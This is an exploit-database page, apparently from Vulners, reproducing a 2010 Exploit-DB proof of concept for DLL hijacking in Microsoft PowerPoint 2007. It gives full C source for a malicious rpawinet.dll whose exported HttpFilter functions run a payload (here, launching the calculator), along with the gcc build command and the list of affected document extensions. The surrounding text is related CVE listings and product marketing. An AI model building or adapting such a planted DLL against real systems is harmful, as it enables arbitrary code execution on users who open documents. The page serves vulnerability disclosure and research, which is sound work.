Lucene search
+L

Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by stormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Microsoft PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) affecting file format

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-3141
27 Aug 201018:10
cve
cve
CVE
CVE-2010-3142
27 Aug 201018:10
cve
cvelist
Cvelist
CVE-2010-3141
27 Aug 201018:10
cvelist
cvelist
Cvelist
CVE-2010-3142
27 Aug 201018:10
cvelist
exploitdb
Exploit DB
Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking
24 Aug 201000:00
exploitdb
euvd
EUVD
EUVD-2010-3141
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3141
27 Aug 201019:00
nvd
nvd
NVD
CVE-2010-3142
27 Aug 201019:00
nvd
openvas
OpenVAS
Microsoft Office Products Insecure Library Loading Vulnerability
9 Sep 201500:00
openvas
prion
Prion
Design/Logic Flaw
27 Aug 201019:00
prion
Rows per page
/*

Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm ([email protected])
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o rpawinet.dll PowerPoint-DLL.c

.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.16311
34